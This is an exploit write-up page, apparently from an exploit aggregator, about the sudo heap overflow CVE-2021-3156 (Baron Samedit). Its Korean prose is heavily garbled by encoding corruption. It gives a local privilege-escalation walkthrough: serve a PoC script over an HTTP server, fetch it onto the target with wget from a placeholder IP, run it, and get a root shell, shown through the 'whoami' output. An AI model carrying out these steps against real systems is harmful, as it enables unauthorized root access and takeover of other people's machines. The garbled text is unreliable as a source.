## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-TOPSKIYPAVELQWERTYGANG-REVIEW.CVE-2021-3156
# π CVE-2021-3156 (Baron Samedit) β sudoμμ ν μ€λ²νλ‘μ°λ₯Ό ν΅ν κΆν μμΉ
π
**λ μ§:** 2025-06-08
βοΈ **μμ±μ:** @TopskiyPavelQwertyGang π§ 보μ μ°κ΅¬μ | λ λν μ νΈκ°
* * *
## π§ CVE κ°μ
* **CVE-ID:** CVE-2021-3156
* **μ ν:** Heap-based Buffer Overflow
* **ꡬμ±μμ:** `sudoedit` (sudo)
* **μ‘μΈμ€ λ 벨:** Local
* **λͺ©ν:** λ£¨νΈ κΆν νλ
* * *
## π§ μ€λͺ
`sudoedit`μ ν μ€λ²νλ‘μ°λ‘ μΈν΄ λ‘컬 μ¬μ©μκ° λ―Έλ¦¬ μ€λΉλ λ§€κ°λ³μλ‘ `sudoedit` λͺ
λ Ήμ μ€νν λ λ£¨νΈ μ‘μΈμ€ κΆνμ μ»μ μ μμ΅λλ€.
μ΄ μ·¨μ½μ μ `sudo` < 1.9.5p2 λ²μ μμ νμ±νλλ©°, μΈκΈ° μλ Ubuntu/Debian/CentOS μ΄λ―Έμ§λ₯Ό ν¬ν¨ν©λλ€. ASLRμ΄ νμ±νλ κ²½μ°μλ μ¬μ ν μ
μ© κ°λ₯ν©λλ€.
* * *
## πΎ μ
μ© μ‘°κ±΄
root@kitploit:~
OS : Ubuntu 20.04.3 LTS
glibc : 2.31 (tcache ON)
sudo : 1.8.31 (μ μ½ν¨)
ASLR : 2 (νμ±ν)
* * *
## π§ͺ νκ²½ μ€λΉ
1. `glibc` λ° `sudo` λ²μ νμΈ:
root@kitploit:~
ldd --version
sudo --version
2. λ΄μ₯ HTTP μλ²λ₯Ό ν΅ν΄ λ€λ₯Έ λ¨Έμ μμ PoC μ€ν¬λ¦½νΈ μ μ‘:
root@kitploit:~
python3 -m http.server 80
3. λμ λ¨Έμ μμ PoC λ€μ΄λ‘λ λ° μ€ν:
root@kitploit:~
wget http://<IP>:80/exploit_nss.py
python3 exploit_nss.py
* * *
## π PoC μ±κ³΅μ μ
μ©
root@kitploit:~
$ python3 exploit_nss.py
# whoami
root
* * *
## π§Ύ κ²°λ‘
`CVE-2021-3156` μ
μ©μ `glibc` β₯ 2.26μ΄κ³ `sudo`κ° μ·¨μ½ν λ²μ μΈ κ²½μ° ASLRμ΄ νμ±νλ μνμμλ κ°λ₯ν©λλ€. κ°μ₯ μμ μ μΈ μ΅μ€νλ‘μμ μ¬λ°λ₯Έ NSS ꡬμ±μμ 첫 λ²μ§Έ μλμ μ±κ³΅νλ `exploit_nss.py`μ
λλ€.
𧨠**μμ€ν
μ΄ μ μ΄λμμ΅λλ€.**
* * *